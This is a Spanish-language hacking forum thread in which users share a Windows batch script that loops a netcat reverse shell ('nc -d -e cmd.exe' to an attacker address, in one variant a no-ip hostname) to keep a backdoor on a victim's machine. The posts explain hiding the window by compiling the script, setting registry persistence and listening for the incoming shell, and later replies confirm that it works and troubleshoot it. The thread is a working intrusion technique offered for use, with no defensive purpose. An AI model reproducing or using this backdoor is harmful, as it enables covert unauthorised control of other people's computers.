Backdoor reverse shell con netcat

Iniciado por skilled, 1 Enero 2007, 23:04 PM

0 Miembros y 1 Visitante están viendo este tema.

skilled

Bueno posteo mi forma de dejar un backdoor reverse shell:

Creo el siguiente bat:

@echo off
:svr
nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr


Si ejecuto el siguiente bat intentara la conexion a x.x.x.x aproximadamente cada minuto creando un bucle infinito.
(Podemos quitar la linea del ping para que intente la conexion infinitamente).

El problema de la ejecución de este backdoor es el cuadro de dialogo de secuencia de comandos. Para poder ocultarlo compilamos el bat con quick batch file compiler triando la opcion ghost application para que oculte el cuadro.
Finalmente añadimos el exe en el registro de la victima y con tansolo poner en nuestra shell: nc -vv -l -p 3333 obtendremos su shell, y si cerramos la conexion la podremos volver a obtener del mismo metodo.

Nose si alguien ya utilizo este metodo.. yo solo he visto utilizar backdoors revere shell con comandos at. Bueno espero que sirva igual.
Skilled --> Learn + Learn = Surpassing   Surpassing = Rejoicing


octalh


RevangelyonX

Creo que es importante decir, que el bat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error, ya que no podrá ejecutar Nc al no encontrar Netcat.

Para que sea compresible, si creamos un bat simple

::No pongamos el @echo off
echo hola
pause
exit

veremos que, al abrirlo, estaremos en la ruta %userprofile%\escritorio>

Con lo cual, o ponemos en bat en la misma carpeta que el nc, o en el bat podemos hacer un:

cd \
cd nc
::por ejemplo

Pero si no, la idea está muy bien! ;)
Un saludo!
Just Linux
OSCP certified

skilled

Primero gracias por postear

Citarbat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error

Esto es un backdoor, supuestamente hemos obtenido el control del sistema (o no...) y queremos dejar una puerta trasera. Nc lo mejor es meterlo en system32 si no:

@echo off
:svr
c:\ruta\nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr


Saludos
Skilled --> Learn + Learn = Surpassing   Surpassing = Rejoicing


octalh

lo e probado y funciona bastante bien, la manera de hacer el "timer" para el bucle me parece muy ingeniosa XD mira que usar un ping es algo muy original.

salu2 y gracias por compartirlo

rakax

Y esto serviria si e vez de mi IP pongo la cuenta de NO-IP? es k tengo IP dinamica.
Gracias
Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc

Zinc


rakax

Quien me explica lo k me pasa,aveces cuando corro un programa en CMD me sale acceso denegado,tengo permisos de administrador,no tengo antivirus ni firewall mal configurado.Hace tiempo k me pasa pero ya no lo aguanto grrr.
Gracias
P.D:Adjunto el codigo para k vean k esta bien,el nc esta en system32
:svr
nc.exe -d -e cmd.exe raka.no-ip.org 5000>nul
ping -n 60 localhost>nul
goto svr

Gracias
Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc

skilled

Prueva de ponerlo en otra carpeta que no sea system32, si te funciona seguramente seran los permisos. Mira las cuentas que tienes y asegurate que eres admin.

Si no te funciona asegurate de no tener ningun tipo de programa antivirus. Haz un net start y mira que no tengas ningun antivirus o programa parecido, y mira los procesos.

Citarno tengo antivirus

Si no es nada de esto pillate un antivirus y haz un repasso a tu disco.

Saludos
Skilled --> Learn + Learn = Surpassing   Surpassing = Rejoicing


Codename!!

hoy dia el nc es detectado enviale un sfx y veras como el panda le salta a la supuesta victima xdd
No te dejes mover por las masas, se tu mismo.